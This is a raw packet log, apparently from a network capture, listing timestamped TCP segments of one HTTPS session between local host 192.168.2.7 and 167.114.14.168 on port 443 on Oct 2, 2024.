                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.450774908 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.450802088 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.450808048 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.450826883 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.450859070 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.450889111 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.466526985 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.466577053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.466625929 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.466643095 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.466670990 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.466694117 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468179941 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468240023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468250036 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468262911 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468293905 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468311071 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468499899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468544006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468564987 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468571901 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468595028 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468616009 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468708038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468765020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468784094 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468791008 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468816996 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468832970 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.468986034 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.469036102 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.469053030 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.469059944 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.469085932 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.469103098 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.469137907 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.469187021 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.469199896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.469218016 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.469243050 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.469264030 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.540668011 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.540719032 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.540812969 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.540839911 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.540875912 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.540896893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.541117907 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.541161060 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.541182041 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.541189909 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.541239977 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.556864023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.556879044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.556945086 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.556965113 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.557001114 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.557317972 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.557332993 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.557388067 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.557394028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.557427883 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.557787895 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.557805061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.557862043 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.557868004 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.557903051 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.558274031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.558290958 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.558329105 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.558336020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.558362961 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.558381081 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.558702946 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.558716059 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.558767080 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.558773041 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.558808088 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.559109926 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.559123039 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.559160948 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.559166908 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.559192896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.559216022 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.563184977 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.631210089 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.631227970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.631367922 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.631396055 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.631437063 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.631701946 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.631716967 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.631771088 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.631778002 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.631815910 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.647304058 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.647324085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.647532940 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.647551060 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.647607088 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.647803068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.647818089 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.647870064 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.647876978 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.647911072 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.648391962 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.648416042 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.648473978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.648480892 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.648511887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.648530006 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.648889065 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.648904085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.648948908 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.648955107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.648981094 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.649000883 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.649442911 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.649458885 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.649535894 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.649535894 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.649543047 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.649698973 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.649719954 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.649749041 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.649755001 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.649777889 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.649806976 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.721887112 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.721910954 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.721996069 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.722017050 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.722145081 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.722342014 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.722358942 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.722414970 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.722420931 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.722462893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.738034964 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.738059044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.738125086 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.738137960 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.738156080 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.738172054 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.738471985 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.738486052 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.738529921 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.738535881 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.738562107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.738580942 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.739129066 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.739150047 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.739223957 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.739229918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.739264011 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.739504099 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.739520073 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.739566088 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.739572048 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.739604950 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.740154028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.740168095 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.740232944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.740238905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.740268946 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.740286112 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.740397930 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.740422964 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.740467072 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.740473032 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.740509033 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.812575102 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.812608004 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.812685966 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.812719107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.812761068 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.812995911 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.813011885 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.813059092 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.813066959 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.813105106 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.828668118 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.828690052 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.828746080 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.828766108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.828808069 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.829139948 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.829159975 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.829200029 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.829206944 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.829236031 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.829253912 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.829628944 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.829644918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.829687119 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.829694033 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.829713106 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.829730034 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.830178022 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.830195904 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.830245972 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.830251932 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.830284119 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.830595016 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.830611944 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.830655098 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.830661058 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.830693007 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.830919981 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.830940008 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.830981970 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.830987930 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.831022024 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.903141975 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.903167009 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.903250933 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.903271914 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.903307915 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.903599024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.903616905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.903657913 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.903665066 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.903692961 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.903712988 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.919277906 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.919296026 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.919364929 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.919377089 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.919425964 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.919704914 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.919719934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.919770956 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.919776917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.919821978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.920243979 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.920258999 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.920314074 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.920320034 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.920362949 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.920784950 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.920799017 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.920874119 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.920881033 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.921123028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.921143055 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.921212912 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.921220064 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.921283007 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.921555996 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.921570063 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.921627998 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.921634912 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.921700954 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.922847033 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.993777037 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.993793011 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.993927956 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.993982077 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.994021893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.994143009 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.994157076 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:55.994198084 CEST49713443192.168.2.7167.114.14.168
